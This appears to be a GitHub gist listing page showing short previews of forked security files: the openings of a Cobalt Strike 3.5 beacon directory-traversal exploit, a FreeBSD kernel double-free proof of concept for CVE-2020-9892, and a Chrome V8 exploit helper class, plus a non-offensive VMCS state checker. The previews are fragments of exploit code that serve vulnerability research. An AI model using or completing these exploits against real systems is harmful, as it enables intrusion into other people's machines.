fuzzheaded
fuzzheaded
/ exploit.py
Created
April 16, 2021 19:27
— forked from olliencc/exploit.py
Retired Cobalt Strike 3.5 exploit example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # First we need to register a beacon with a directory traversal in the ip address field | |
| ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0] | |
| # Generate symmetric keys (used later) | |
| raw_aes_keys = os.urandom(16) | |
| aes_key, hmac_key = generate_keys(raw_aes_keys) | |
| m = Metadata(public_key=args.public_key, cs_version=3) | |
| m.public_key = args.public_key | |
| m.bid = args.bid |
fuzzheaded
/ ip6_expl_poc.c
Created
March 22, 2021 09:17
— forked from Cryptogenic/ip6_expl_poc.c
Kernel exploit POC (Proof-of-Concept) for IP6_EXTHDR_CHECK double free (CVE-2020-9892). Interleaves with multi-threads for code exec. Mainly a reference for PS4 implementation.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * IP6_EXTHDR_CHECK Double Free (CVE-2020-9892) Exploit PoC for FreeBSD 9.0 | |
| * https://github.com/google/security-research/security/advisories/GHSA-gxcr-cw4q-9q78 | |
| * - | |
| * Bug credit: Andy Nguyen (@theflow0) | |
| * Exploit credit: @SpecterDev, @tihmstar | |
| * Thanks: @sleirsgoevy, @littlelailo, flatz (@flat_z), @balika011 | |
| * - | |
| * Build: gcc -o expl ip6_expl_poc.c -pthread | |
| * - |
fuzzheaded
/ chrome-v8-issue-1126249.js
Created
March 21, 2021 20:02
— forked from hkraw/chrome-v8-issue-1126249.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Helpers { | |
| constructor() { | |
| this.cvt_buf = new ArrayBuffer(8); | |
| this.cvt_f64a = new Float64Array(this.cvt_buf); | |
| this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
| this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
| } | |
| ftoi(f) { |
fuzzheaded
/ CheckGuestVmcsFieldsForVmEntry.c
Created
February 22, 2021 21:31
— forked from tandasat/CheckGuestVmcsFieldsForVmEntry.c
Simulation of checks performed as per 26.3 CHECKING AND LOADING GUEST STATE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @file CheckGuestVmcsFieldsForVmEntry.c | |
| * @author Satoshi Tanda ([email protected]) | |
| * @brief Checks validity of the guest VMCS fields for VM-entry as per | |
| * 26.3 CHECKING AND LOADING GUEST STATE | |
| * @version 0.1 | |
| * @date 2021-02-20 | |
| * | |
| * @details This file implements part of checks performed by a processor during | |
| * VM-entry as CheckGuestVmcsFieldsForVmEntry(). This can be called on VM-exit |